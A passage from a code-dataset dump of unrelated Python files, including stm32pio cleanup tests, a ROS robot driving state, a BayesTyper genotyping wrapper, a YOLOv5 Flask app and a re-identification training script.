root=Path(endpoint) if root is None else (root / endpoint)))\n return tree_paths\n\n def tree_exists_fully(path: Path, tree: Mapping[str, Union[str, Mapping]]):\n tree_paths = flatten_tree(tree, root=path)\n actual_paths = list(path.rglob('*'))\n return all(endpoint in actual_paths for endpoint in tree_paths)\n\n def tree_not_exists_fully(path: Path, tree: Mapping[str, Union[str, Mapping]]):\n tree_paths = flatten_tree(tree, root=path)\n actual_paths = list(path.rglob('*'))\n return all(endpoint not in actual_paths for endpoint in tree_paths)\n\n test_tree = {\n 'root_file.txt': '',\n 'root empty folder': {},\n 'root_folder': {\n 'nested_file.mp3': '',\n 'nested_folder': {\n 'file_in_nested_folder_1.jpg': '',\n 'file in nested folder 2.png': ''\n }\n }\n }\n test_tree_endpoints = flatten_tree(test_tree)\n\n plant_fs_tree(STAGE_PATH, test_tree)\n with self.subTest(msg=\"quiet\"):\n project = stm32pio.core.project.Stm32pio(STAGE_PATH)\n project.clean()\n self.assertTrue(tree_not_exists_fully(STAGE_PATH, test_tree), msg=\"Test tree hasn't been removed\")\n self.assertTrue(project.cubemx.ioc.path.exists(), msg=\".ios file wasn't preserved\")\n\n self.setUp() # same actions we perform between test cases (external cleaning)\n plant_fs_tree(STAGE_PATH, test_tree)\n with self.subTest(msg=\"not quiet, respond yes\"):\n project = stm32pio.core.project.Stm32pio(STAGE_PATH)\n with unittest.mock.patch('builtins.input', return_value=stm32pio.core.settings.yes_options[0]):\n project.clean(quiet=False)\n input_args, input_kwargs = input.call_args # input() function was called with these arguments\n input_prompt = input_args[0]\n # Check only for a name as the path separator is different for UNIX/Win\n self.assertTrue(all(endpoint.name in input_prompt for endpoint in test_tree_endpoints),\n msg=\"Paths for removal should be reported to the user\")\n self.assertTrue(tree_not_exists_fully(STAGE_PATH, test_tree), msg=\"Test tree hasn't been removed\")\n self.assertTrue(project.cubemx.ioc.path.exists(), msg=\".ios file wasn't preserved\")\n\n self.setUp()\n plant_fs_tree(STAGE_PATH, test_tree)\n with self.subTest(msg=\"not quiet, respond no\"):\n project = stm32pio.core.project.Stm32pio(STAGE_PATH)\n with unittest.mock.patch('builtins.input', return_value=stm32pio.core.settings.no_options[0]):\n project.clean(quiet=False)\n self.assertTrue(tree_exists_fully(STAGE_PATH, test_tree), msg=\"Test tree wasn't preserved\")\n self.assertTrue(project.cubemx.ioc.path.exists(), msg=\".ios file wasn't preserved\")\n\n self.setUp()\n plant_fs_tree(STAGE_PATH, test_tree)\n with self.subTest(msg=\"user's ignore list\"):\n ignore_list = [\n f'{STAGE_PATH.name}.ioc',\n 'root_file.txt',\n 'this_path_doesnt_exist_yet',\n 'root_folder/nested_folder/file_in_nested_folder_1.jpg'\n ]\n ignore_list_unfolded = reduce(\n lambda array, entry:\n array + # accumulator\n [Path(entry)] + # include the entry itself cause it isn't among parents\n [parent for parent in Path(entry).parents if parent != Path()], # remove the '.' path\n ignore_list, [])\n project = stm32pio.core.project.Stm32pio(STAGE_PATH)\n project.config.set('project', 'cleanup_ignore', '\\n'.join(ignore_list))\n project.clean()\n for endpoint in [STAGE_PATH / entry for entry in test_tree_endpoints]:\n if endpoint.relative_to(STAGE_PATH) in ignore_list_unfolded:\n self.assertTrue(endpoint.exists(), msg=\"Files/folders from the ignore list should be preserved\")\n else:\n self.assertFalse(endpoint.exists(), msg=\"Unnecessary files/folders hasn't been removed\")\n\n self.setUp()\n subprocess.run(['git', 'init'], cwd=str(STAGE_PATH), check=True) # TODO: str() - 3.6 compatibility\n plant_fs_tree(STAGE_PATH, test_tree)\n STAGE_PATH.joinpath('.gitignore').write_text(inspect.cleandoc('''\n # sample .gitignore\n *.mp3\n '''))\n with self.subTest(msg=\"use .gitignore\"):\n project = stm32pio.core.project.Stm32pio(STAGE_PATH)\n # This is important, otherwise git won't clean anything\n subprocess.run(['git', 'add', '--all'], cwd=str(STAGE_PATH), check=True) # TODO: str() - 3.6 compatibility\n project.config.set('project', 'cleanup_use_git', 'yes')\n project.clean()\n for endpoint in [STAGE_PATH / entry for entry in test_tree_endpoints]:\n if endpoint.relative_to(STAGE_PATH) == Path('root_folder').joinpath('nested_file.mp3'):\n self.assertFalse(endpoint.exists(), msg=\"Files/folders from the .gitignore should be removed\")\n else:\n self.assertTrue(endpoint.exists(), msg=\"Files/folders tracked by git should be preserved\")\n\n # Nasty hack for Windows, otherwise it may not delete all the temp files\n # (https://github.com/ussserrr/stm32pio/issues/23)\n if platform.system() == 'Windows':\n subprocess.run(f'rd /s /q \"{STAGE_PATH}\"', shell=True, check=True)\n\n self.setUp()\n plant_fs_tree(STAGE_PATH, test_tree)\n with self.subTest(msg=\"save current content in ignore list\"):\n project = stm32pio.core.project.Stm32pio(STAGE_PATH)\n project.config.set_content_as_ignore_list()\n STAGE_PATH.joinpath('this_file_should_be_removed').touch()\n project.clean()\n self.assertTrue(tree_exists_fully(STAGE_PATH, test_tree), msg=\"Test tree should be preserved\")\n self.assertFalse(STAGE_PATH.joinpath('this_file_should_be_removed').exists(),\n msg=\"File added later should be removed\")\n","repo_name":"ussserrr/stm32pio","sub_path":"tests/test_unit.py","file_name":"test_unit.py","file_ext":"py","file_size_in_byte":23096,"program_lang":"python","lang":"en","doc_type":"code","stars":193,"dataset":"github-code","pt":"40"} +{"seq_id":"43255141743","text":"from technical_analysis._utils.convert_datatype import convert_to_numpy, convert_numpy\nimport technical_analysis as ta\nimport numpy as np\n\ndef ADX(high, low, close, limit=14):\n # validate data\n high, original_datatype = convert_to_numpy(high)\n low, _ = convert_to_numpy(low)\n close, _ = convert_to_numpy(close)\n \n np.seterr(divide='ignore', invalid='ignore')\n\n # find di\n plus_di = ta.PLUS_DI(high, low, close, limit)\n minus_di = ta.MINUS_DI(high, low, close, limit)\n\n # calculate dx\n dx = abs(plus_di - minus_di)/abs(plus_di + minus_di)\n\n # get average directional movement index using \n adx = 100*ta.RMA(dx, limit)\n\n return convert_numpy(adx, original_datatype)","repo_name":"h3x4d1v1n3/technical_analysis","sub_path":"technical_analysis/trend/_average_directional_movement_index.py","file_name":"_average_directional_movement_index.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"15727470590","text":"def paginate(result_list, pageNum, pageSize):\n page_num = 1\n page_size = len(result_list)\n\n page_num = int(pageNum) if pageNum else page_num\n\n page_size = int(pageSize) if pageSize else page_size\n\n start = (page_num - 1) * page_size\n end = start + page_size\n return result_list[slice(start, end)]\n","repo_name":"Nguyen-Quy/quasar-todo","sub_path":"backend/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37468061355","text":"#!/usr/bin/env python\nimport rospy\nfrom flexbe_core import EventState, Logger\nfrom flexbe_core.proxy import ProxyPublisher, ProxySubscriberCached\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import LaserScan\n\nclass GoForwardState_input(EventState):\n\n def __init__(self, speed, travel_dist, obstacle_dist):\n super(GoForwardState_input, self).__init__(outcomes=['failed', 'done'],\n input_keys=['remaining_travel_dist_IN'],\n output_keys=['remaining_travel_dist_OUT'])\n self._start_time = None\n self.distance_traveled = 0.0\n self.data = None\n self._speed = speed\n self._travel_dist = travel_dist\n self._obstacle_dist = obstacle_dist\n\n self.vel_topic = 'diff_velocity_controller/cmd_vel'\n self.scan_topic = '/scan'\n\n #create publisher passing it the vel_topic_name and msg_type\n self.pub = ProxyPublisher({self.vel_topic: Twist})\n #create subsciber\n self.scan_sub = ProxySubscriberCached({self.scan_topic: LaserScan})\n #self.scan_sub.set_callback(self.scan_topic, self.scan_callback)\n\n def execute(self, userdata):\n if not self.cmd_pub:\n return 'failed'\n #run obstacle checks [index 0: Left, 360: middle, 719:right]\n if(self.scan_sub.has_msg(self.scan_topic)):\n self.data = self.scan_sub.get_last_msg(self.scan_topic)\n self.scan_sub.remove_last_msg(self.scan_topic)\n Logger.loginfo('FWD obstacle distance is: %s' % self.data.ranges[360])\n if self.data.ranges[360] <= self._obstacle_dist:\n self.data = None\n userdata.remaining_travel_dist_OUT = self._travel_dist - self.distance_traveled\n return 'failed'\n\n #measure distance traveled\n elapsed_time = (rospy.Time.now() - self._start_time).to_sec()\n self.distance_traveled = elapsed_time * self._speed\n\n if self.distance_traveled >= self._travel_dist:\n return 'done'\n\n #drive\n self.pub.publish(self.vel_topic, self.cmd_pub)\n\n def on_enter(self, userdata):\n Logger.loginfo('Drive FWD STARTED!')\n self._start_time = rospy.Time.now()\n #set robot speed here\n self.cmd_pub = Twist()\n self.cmd_pub.linear.x = self._speed\n self.cmd_pub.angular.z = 0.0\n\n if userdata.remaining_travel_dist_IN:\n self._travel_dist = userdata.remaining_travel_dist_IN\n Logger.loginfo(\"Remaing Distance to Travel %s\" % self._travel_dist)\n\n def on_exit(self, userdata):\n self.cmd_pub.linear.x = 0.0\n self.pub.publish(self.vel_topic, self.cmd_pub)\n Logger.loginfo('Drive FWD ENDED!')\n\n def on_start(self):\n Logger.loginfo('Drive FWD READY!')\n\n def on_stop(self):\n Logger.loginfo('Drive FWD STOPPED!')\n\n def scan_callback(self, data):\n self.data = data\n\n\n\n\n","repo_name":"guidosassaroli/mobile_manipulator","sub_path":"extra_packages/flexbe/lynxbot_behaviors/lynxbot_flexbe_states/src/lynxbot_flexbe_states/drive_forward_input.py","file_name":"drive_forward_input.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37686150411","text":"'''\nA dictionary containing simple parameters of current and future CMB experiments. \n'''\nbolometers = {'Planck': {'fsky': 1.0, 'thetab': 7.0, 'DeltaT': 30.0, 'iterative': False},\\\n 'AdvACT': {'fsky': 0.2, 'thetab': 1.5, 'DeltaT': 12.0, 'iterative': False},\\\n 'SO': {'fsky': 0.4, 'thetab': 1.4, 'DeltaT': 7.0, 'iterative': False},\\\n 'CMBS4': {'fsky': 0.4, 'thetab': 1.4, 'DeltaT': 1.0, 'iterative': True},\\\n # 'CORE': {'fsky': 0.8, 'thetab': 2.0, 'DeltaT': 2.0, 'iterative': False},\\\n # \n # Schmittfull & Seljak (2017); https://arxiv.org/pdf/1710.09465.pdf\n # 'SS17': {'fsky': 0.5, 'thetab': 1.0, 'DeltaT': 1.0, 'iterative': True}\n }\n\n\nif __name__ == '__main__':\n print('\\n\\nWelcome to bolometers.\\n\\n')\n\n dict = bolometers['SO']\n\n print('\\n\\nDone.\\n\\n')\n","repo_name":"michaelJwilson/LBGCMB","sub_path":"cmb/bolometers.py","file_name":"bolometers.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"20522293369","text":"from model.contact import Contact\nimport random\nimport string\nimport os.path\nimport jsonpickle\nimport getopt\nimport sys\n\n\ntry:\n opts, args = getopt.getopt(sys.argv[1:], \"n:f:\", [\"number of contact\", \"file\"])\nexcept getopt.GetoptError as err:\n getopt.usage()\n sys.exit(2)\n\nn = 3\nf = \"data/contacts.json\"\n\nfor o, a in opts:\n if o == \"-n\":\n n = int(a)\n elif o == \"-f\":\n f = a\n\n\ndef random_string(maxlen):\n symbols = string.ascii_letters + string.digits + \" \"*10\n return \"\".join([random.choice(symbols) for i in range(random.randrange(maxlen))])\n\n\ndef random_number(maxlen):\n symbols = string.digits\n return \"\".join([random.choice(symbols) for i in range(random.randrange(maxlen))])\n\n\ndef random_day():\n days = []\n for i in range(1, 32):\n days.append(i)\n return str(random.choice(days))\n\n\ndef random_month():\n months = [\"January\", \"February\", \"March\", \"April\", \"May\", \"June\", \"July\", \"August\", \"September\", \"October\", \"November\", \"December\"]\n return random.choice(months)\n\n\ndef random_email(maxlen):\n e = string.ascii_letters + string.digits\n mail = string.ascii_letters + string.digits + \".\"\n return \"\".join([random.choice(e) for i in range(random.randrange(maxlen))]) + \"@\".join([random.choice(mail) for i in range(random.randrange(maxlen))])\n\n\ndef random_site(maxlen):\n site = string.ascii_letters + string.digits\n return \"www\" + \"\".join([random.choice(site) for i in range(random.randrange(maxlen))])\n\n\ntestdata = [Contact(firstname=random_string(6),\n middlename=random_string(4),\n lastname=random_string(9),\n nickname=random_string(8),\n title=random_string(20),\n company=random_string(8),\n address=random_string(30),\n home=random_number(9),\n mobile=random_number(9),\n work=random_number(9),\n fax=random_number(9),\n email=random_email(6),\n email2=random_email(5),\n email3=random_email(4),\n homepage=random_site(10),\n bday=random_day(),\n bmonth=random_month(),\n byear=random_number(4),\n address2=random_string(35),\n phone2=random_number(10),\n notes=random_string(15)) for i in range(n)]\n\n\nfile = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"..\", f)\n\nwith open(file, \"w\") as out:\n jsonpickle.set_encoder_options(\"json\", indent=2)\n out.write(jsonpickle.encode(testdata))","repo_name":"AlreyQuin/python_training","sub_path":"generator/contact.py","file_name":"contact.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30188082008","text":"import time\r\nfrom threading import Timer\r\n\r\n\r\ndef display(msg):\r\n print(msg + ' ' + time.strftime('%H:%M:%S'))\r\n\r\n\r\nclass RepeatTimer(Timer):\r\n def run(self):\r\n while not self.finished.wait(self.interval):\r\n self.function(*self.args, **self.kwargs)\r\n print(' ')\r\n\r\n\r\n# We are now creating a thread timer and controling it\r\ntimer = RepeatTimer(1, display, [''])\r\ntimer.start() # recalling run\r\nprint('Threading started')\r\ntime.sleep(10) # It gets suspended for the given number of seconds\r\ntimer.cancel()\r\nprint('Threading finishing')\r\n","repo_name":"Mathiiss/demieur","sub_path":"timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30453781533","text":"def nones_a_0(valor):\n if valor == None:\n return 0\n else:\n return valor\n\ndef nota_teoria(media1, media2):\n nota1 = nones_a_0(media1)\n nota2 = nones_a_0(media2)\n return (nota1 + nota2) / 2\n\ndef nota_cuatrimestre(notas_teoricas, nota_practico):\n practico = nones_a_0(nota_practico)\n media_teoricos = nota_teoria(notas_teoricas[0], notas_teoricas[1])\n if media_teoricos > 4:\n nota_final = 0.2 * media_teoricos + 0.8 * practico\n else:\n nota_final = 0\n return nota_final\n\ndef nota_continua(notas_teoricas, notas_practicas):\n nota_primer_cuatrimestre = nota_cuatrimestre(notas_teoricas[0:2], notas_practicas[0])\n nota_segundo_cuatrimestre = nota_cuatrimestre(notas_teoricas[2:4], notas_practicas[1])\n nota_final = (nota_primer_cuatrimestre + nota_segundo_cuatrimestre) / 2\n if nota_primer_cuatrimestre < 4 or nota_segundo_cuatrimestre < 4:\n nota_final = min(4, nota_final)\n return nota_final\n","repo_name":"micrusa/practicas-fp-python","sub_path":"lab-1_calificaciones/src/calificaciones.py","file_name":"calificaciones.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7715771048","text":"#!/usr/bin/env python3\r\n\r\n# -*- coding: utf-8 -*-\r\n\r\nimport os\r\nimport run_cmd\r\nfrom getsize import getsize\r\n\r\n\r\n# genotype\r\ndef main(\r\n reference_file: str,\r\n vcf_file: str,\r\n bam2bayestyper_file: str,\r\n bam_infos_map, \r\n env_path, \r\n threads: int,\r\n restart: bool\r\n):\r\n \"\"\"\r\n :param reference_file: reference genome\r\n :param vcf_file: vcf file\r\n :param bam2bayestyper_file: configure fule\r\n :param bam_infos_map: information of BAM\r\n :param env_path: env path\r\n :param threads: thread\r\n :param restart: Whether to check if the file exists and skip this step\r\n :return:\r\n \"\"\"\r\n\r\n # log\r\n stdout = \"\"\r\n stderr = \"\"\r\n log_out = \"\"\r\n\r\n # First traverse the bam file and soft-link it to the current working path\r\n for key, value in bam_infos_map.items():\r\n bam_file = value[\"bam_file\"]\r\n # ln\r\n cmd = \"ln -sf {} .\".format(bam_file)\r\n # submit task\r\n stdout, stderr, log_out = run_cmd.run(cmd, \"BayesTyper.ln\", env_path)\r\n # Report an error if there is a problem with the exit code\r\n if log_out:\r\n return stdout, stderr, log_out, \"\"\r\n\r\n # Traversing bam file hashes\r\n work_dir = os.getcwd()\r\n try:\r\n with open(bam2bayestyper_file, \"r\") as f:\r\n for information in f.readlines():\r\n informations_split = information.strip().split()\r\n prefix = informations_split[0]\r\n prefix = prefix + \".bam\" # Makefile prefix\r\n bam_file = informations_split[2]\r\n\r\n # kmc\r\n cmd = \"kmc -k55 -ci1 -t1 -fbam {} {} {}\".format(bam_file, prefix, work_dir)\r\n\r\n # Check if the file exists\r\n if restart:\r\n # <= 0\r\n if getsize(prefix + \".kmc_pre\") <= 0 or getsize(prefix + \".kmc_suf\") <= 0:\r\n # submit task\r\n stdout, stderr, log_out = run_cmd.run(cmd, \"BayesTyper.kmc\", env_path)\r\n else: # If restart is not specified, run directly\r\n # submit task\r\n stdout, stderr, log_out = run_cmd.run(cmd, \"BayesTyper.kmc\", env_path)\r\n\r\n # Report an error if there is a problem with the exit code\r\n if log_out:\r\n return stdout, stderr, log_out, \"\"\r\n\r\n # bayesTyperTools makeBloom\r\n cmd = \"bayesTyperTools makeBloom -k {} -p {}\".format(prefix, threads)\r\n\r\n # Check if the file exists\r\n if restart:\r\n # <= 0\r\n if getsize(prefix + \".bloomData\") <= 0 or getsize(prefix + \".bloomMeta\") <= 0:\r\n # submit task\r\n stdout, stderr, log_out = run_cmd.run(cmd, \"BayesTyper.makeBloom\", env_path)\r\n else: # If restart is not specified, run directly\r\n # submit task\r\n stdout, stderr, log_out = run_cmd.run(cmd, \"BayesTyper.makeBloom\", env_path)\r\n\r\n # Report an error if there is a problem with the exit code\r\n if log_out:\r\n return stdout, stderr, log_out, \"\"\r\n except FileNotFoundError:\r\n log_out = \"[EVG.{}] FileNotFoundError: [Errno 2] No such file or directory: '{}'.\\n\".format(\r\n \"BayesTyper\",\r\n bam2bayestyper_file\r\n )\r\n return \"\", \"\", log_out, \"\"\r\n\r\n # bayesTyper cluster\r\n cmd = \"bayesTyper cluster -v {} -s {} -g {} -p {}\".format(\r\n vcf_file,\r\n bam2bayestyper_file,\r\n reference_file,\r\n threads\r\n )\r\n\r\n # Check if the file exists\r\n if restart:\r\n # <= 0\r\n if getsize(\"bayestyper_cluster_data/intercluster_regions.txt.gz\") <= 0 or \\\r\n getsize(\"bayestyper_cluster_data/multigroup_kmers.bloomData\") <= 0 or \\\r\n getsize(\"bayestyper_cluster_data/multigroup_kmers.bloomMeta\") <= 0 or \\\r\n getsize(\"bayestyper_cluster_data/parameter_kmers.fa.gz\") <= 0:\r\n # submit task\r\n stdout, stderr, log_out = run_cmd.run(cmd, \"BayesTyper.cluster\", env_path)\r\n else: # If restart is not specified, run directly\r\n # submit task\r\n stdout, stderr, log_out = run_cmd.run(cmd, \"BayesTyper.cluster\", env_path)\r\n\r\n # Report an error if there is a problem with the exit code\r\n if log_out:\r\n return stdout, stderr, log_out, \"\"\r\n\r\n # bayesTyper genotype\r\n cmd = \"bayesTyper genotype -v bayestyper_unit_1/variant_clusters.bin -c bayestyper_\" \\\r\n \"cluster_data -s {} -g {} -o bayestyper_unit_1/bayestyper -z -p {} --noise-genotyping\".\\\r\n format(bam2bayestyper_file, reference_file, threads)\r\n\r\n # Check if the file exists\r\n if restart:\r\n # check file\r\n file_size = getsize(\r\n \"bayestyper_unit_1/bayestyper.vcf.gz\"\r\n )\r\n # <= 0\r\n if file_size <= 0:\r\n # submit task\r\n stdout, stderr, log_out = run_cmd.run(cmd, \"BayesTyper.genotype\", env_path)\r\n else: # If restart is not specified, run directly\r\n # submit task\r\n stdout, stderr, log_out = run_cmd.run(cmd, \"BayesTyper.genotype\", env_path)\r\n\r\n vcf_out_file = os.path.join(os.getcwd(), \"bayestyper_unit_1/bayestyper.vcf.gz\")\r\n\r\n return stdout, stderr, log_out, vcf_out_file\r\n","repo_name":"JiaoLab2021/EVG","sub_path":"src/BayesTyper.py","file_name":"BayesTyper.py","file_ext":"py","file_size_in_byte":5464,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"40"} +{"seq_id":"9052461485","text":"from crypt import methods\nimport string\nimport youtube_dl\nfrom requests import request\nfrom App import app\nfrom flask import render_template\nimport torch\nimport youtube_dl\nimport flask\nfrom App import utils\nimport cv2 as cv\nfrom pathlib import Path \nimport sys \nfrom utils.general import LOGGER, check_file, check_img_size, check_imshow, check_requirements\nimport requests\n\nsys.path.append('..')\n\n\n\n@app.route('/', methods=['get', 'post'])\ndef accueil():\n \n return render_template(\"predict.html\")\n\n\n\n@app.route('/predict', methods=['get', 'post'])\ndef prediction():\n # model = torch.hub.load('ultralytics/yolov5', 'yolov5m6')\n url = flask.request.form['url']\n data ={'url':url}\n x = requests.post('http://127.0.0.1:5000/predict', json=url, headers={'Content-Type': 'application/json'})\n # utils.dl_yt(str(url))\n return \"ok\"\n\n@app.route('/testprediction')\ndef test():\n model = torch.hub.load('ultralytics/yolov5', 'custom', path='weights/best.pt', force_reload=True)\n stride, names, pt = model.stride, model.names, model.pt\n imgsz = check_img_size((640, 640), s=stride) \n cam=cv.VideoCapture('Bah ils sont où tes potes -oCVRRHl4NM8.f299.mp4')\n number_of_frame = cam.get(cv.CAP_PROP_FRAME_COUNT)\n print(number_of_frame)\n fps=cam.get(cv.CAP_PROP_FPS)\n print('fps: ', fps)\n n=0\n i=0\n while True:\n ret, frame = cam.read()\n print('first step')\n if (2*n)%fps==0:\n pred = model(frame)\n print('predict in progress')\n i+=1\n n+=1\n if not ret:\n print(i)\n print(n)\n break\n cam.release()\n cv.destroyAllWindows()\n return \"okok\"","repo_name":"theotrc/Brandseeker_website","sub_path":"App/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12135233766","text":"# -*- coding: utf-8 -*-\r\nfrom PyQt5.QtWidgets import QWidget\r\nfrom PyQt5.QtCore import pyqtSlot, pyqtSignal, Qt\r\nfrom ui.frmAboutUi import *\r\nfrom AxRobotData import *\r\n\r\nclass frmAbout(QWidget,Ui_FormAbout):\r\n\r\n def __init__(self, MotionCtrl):\r\n super(frmAbout, self).__init__()\r\n # Init UI components\r\n self.setupUi(self)\r\n\r\n # Init normal data\r\n self.MotionCtrl = MotionCtrl\r\n self.MotionData = MotionCtrl.MotionData\r\n\r\n self.setWindowFlags(QtCore.Qt.WindowCloseButtonHint)\r\n self.setWindowModality(2)\r\n\r\n # Load icon\r\n if os.path.isfile(dctAPP_CFIG[\"ABOUT_ICON\"]) == True:\r\n self.setWindowIcon(QtGui.QIcon(dctAPP_CFIG[\"ABOUT_ICON\"]))\r\n\r\n # Build up information\r\n self.lbAboutTitle.setText(\"AxRobot Motion Control Utility\")\r\n strInfo = \"\"\r\n strInfo += \"Version: {}\\r\\n\".format(dctAPP_CFIG[\"APP_VER\"])\r\n strInfo += \"VCP Identification {}\\r\\n\".format(dctAPP_CFIG[\"USB_CDC_IDENTIFY\"])\r\n strInfo += \"OS: Windows7/10 x64\\r\\n\"\r\n self.lbInfo.setText(strInfo)\r\n\r\n # Build up hyper link\r\n self.lbHyperLink_1.setText(\"{}: <A href='{}'>{}</a>\" \\\r\n .format(dctAPP_CFIG[\"LINK_TITLE_1\"], dctAPP_CFIG[\"HYPER_LINK_1\"], dctAPP_CFIG[\"HYPER_LINK_1\"]))\r\n self.lbHyperLink_1.setOpenExternalLinks(True)\r\n\r\n # Connect signal&slot paire\r\n self.btnCloseAbout.clicked.connect(self.click)\r\n\r\n def click(self):\r\n self.close()\r\n\r\n#End of Class frmAbout\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"MyRobot-lab/AxRobotUtility","sub_path":"frmAbout.py","file_name":"frmAbout.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70125618042","text":"def check_anagram(a, b):\n if a is None or b is None or len(a) != len(b):\n return \"No es anagrama\"\n \n contador_a = {}\n contador_b = {}\n \n for i in a:\n if i not in contador_a.keys():\n contador_a[i] = 1\n else:\n contador_a[i] += 1\n \n for i in b:\n if i not in contador_b.keys():\n contador_b[i] = 1\n else:\n contador_b[i] += 1\n print(contador_a)\n print(contador_b)\n return \"Es anagrama\" if contador_a == contador_b else \"No es anagrama\"\n\nprint(check_anagram(\"mora\", \"roma\"))\n#{'m': 1, 'o': 1, 'r': 1, 'a': 1}\n#{'r': 1, 'o': 1, 'm': 1, 'a': 1}","repo_name":"HerbertM21/PyLogic","sub_path":"05. Algoritmos avanzados/Anagrama.py","file_name":"Anagrama.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"44069722251","text":"#\n# @lc app=leetcode id=34 lang=python3\n#\n# [34] Find First and Last Position of Element in Sorted Array\n#\n\n# @lc code=start\nimport bisect\nfrom typing import List\n\n\nclass Solution:\n def searchRange(self, nums: List[int], target: int) -> List[int]:\n if not nums:\n return [-1, -1]\n \n # l_index = bisect.bisect_left(nums, target)\n # r_index = bisect.bisect_right(nums, target)\n \n less = -1\n eq_or_greater = len(nums)\n while eq_or_greater - less > 1:\n mid = (less+eq_or_greater)//2\n if nums[mid] < target:\n less = mid\n else:\n eq_or_greater = mid\n l_index = eq_or_greater \n \n less_or_eq = -1\n greater = len(nums)\n while greater - less_or_eq > 1:\n mid = (less_or_eq+greater)//2\n if nums[mid] <= target:\n less_or_eq = mid\n else:\n greater = mid\n r_index = greater \n \n \n if l_index < len(nums) and nums[l_index] == target:\n return l_index, r_index-1\n else:\n return -1, -1\n \n \n \n# @lc code=end\n","repo_name":"yoshikipom/leetcode","sub_path":"solve/34.find-first-and-last-position-of-element-in-sorted-array.py","file_name":"34.find-first-and-last-position-of-element-in-sorted-array.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38812020408","text":"import datetime\r\nimport os\r\nimport sys\r\nimport time\r\nimport torch\r\nimport os.path as osp\r\nfrom torch.backends import cudnn\r\nfrom data.data_loader_build import build_data_loader\r\nfrom losses.loss_build import build_loss\r\nfrom model.model_build import build_model\r\nfrom utils.infer import inference\r\nfrom utils.logger import Logger\r\nfrom utils.lr_scheduler import WarmupMultiStepLR\r\nfrom utils.optimizer_build import build_optimizer\r\nfrom utils.trainer import do_train\r\n\r\nevaluate = False\r\nsave_dir = \"./\"\r\nresume = \"\"\r\n\r\n\r\ndef set_seed(seed):\r\n torch.manual_seed(seed)\r\n torch.cuda.manual_seed(seed)\r\n # torch.cuda.manual_seed_all(seed)\r\n # np.random.seed(seed)\r\n # random.seed(seed)\r\n # torch.backends.cudnn.deterministic = True\r\n # torch.backends.cudnn.benchmark = True\r\n cudnn.benchmark = True\r\n\r\n\r\ndef main(args=None):\r\n if torch.cuda.is_available():\r\n print(\"cuda is available\")\r\n else:\r\n print(\"cuda is not available\")\r\n\r\n if not evaluate:\r\n sys.stdout = Logger(osp.join(save_dir, 'log_train_test.txt'))\r\n else:\r\n sys.stdout = Logger(osp.join(save_dir, 'log_test.txt'))\r\n\r\n print(\"Currently using GPU {}\".format(\"0\"))\r\n os.environ['CUDA_VISIBLE_DEVICES'] = \"0,1,2,3\"\r\n set_seed(3)\r\n if args is not None:\r\n data = args[\"dataset\"]\r\n else:\r\n data = 'm'\r\n train_loader, query_loader, gallery_loader, num_query, num_classes, test_loader, dataset_name = build_data_loader(\r\n data)\r\n\r\n print(\"Initializing model: {}\".format(\"MFEN\"))\r\n model = build_model(num_classes, data)\r\n print(\"Model size: {:.5f}M\".format(sum(p.numel() for p in model.parameters()) / 1000000.0))\r\n\r\n loss_func, center_criterion = build_loss(num_classes)\r\n optimizer, optimizer_center = build_optimizer(model, center_criterion)\r\n scheduler = WarmupMultiStepLR(optimizer, [40, 70], 0.1, 0.01, 10)\r\n\r\n start_epoch = 1\r\n max_epoch = 140\r\n\r\n if resume:\r\n print(\"Loading checkpoint from '{}'\".format(resume))\r\n checkpoint = torch.load(resume)\r\n model.load_state_dict(checkpoint['state_dict'])\r\n start_epoch = checkpoint['epoch'] + 1\r\n\r\n if evaluate:\r\n print(\"Evaluate only\")\r\n inference(model, query_loader, gallery_loader, dataset_name)\r\n return 0\r\n\r\n start = time.time()\r\n train_time = 0\r\n\r\n print(\"==> Start training\")\r\n for epoch in range(start_epoch, max_epoch + 1):\r\n start_time = time.time()\r\n\r\n do_train(\r\n epoch,\r\n model,\r\n center_criterion,\r\n train_loader,\r\n optimizer,\r\n optimizer_center,\r\n loss_func,\r\n )\r\n scheduler.step()\r\n time_epoch = round(time.time() - start_time)\r\n print(\"Epoch {} done. Time of epoch: {:.3f}[s]\"\r\n .format(epoch, time_epoch))\r\n train_time += time_epoch\r\n state = {'state_dict': model.state_dict(), 'epoch': epoch}\r\n if epoch % 20 == 0:\r\n torch.save(state, os.path.join(save_dir, \"MFEN\" + '_{}.pth'.format(epoch)))\r\n if epoch == max_epoch:\r\n # if epoch % 20 == 0:\r\n print(\"==> Test\")\r\n inference(model, query_loader, gallery_loader, dataset_name)\r\n\r\n elapsed = round(time.time() - start)\r\n elapsed = str(datetime.timedelta(seconds=elapsed))\r\n train_time = str(datetime.timedelta(seconds=train_time))\r\n print(\"Finished. Total elapsed time (h:m:s): {}. Training time (h:m:s): {}.\".format(elapsed, 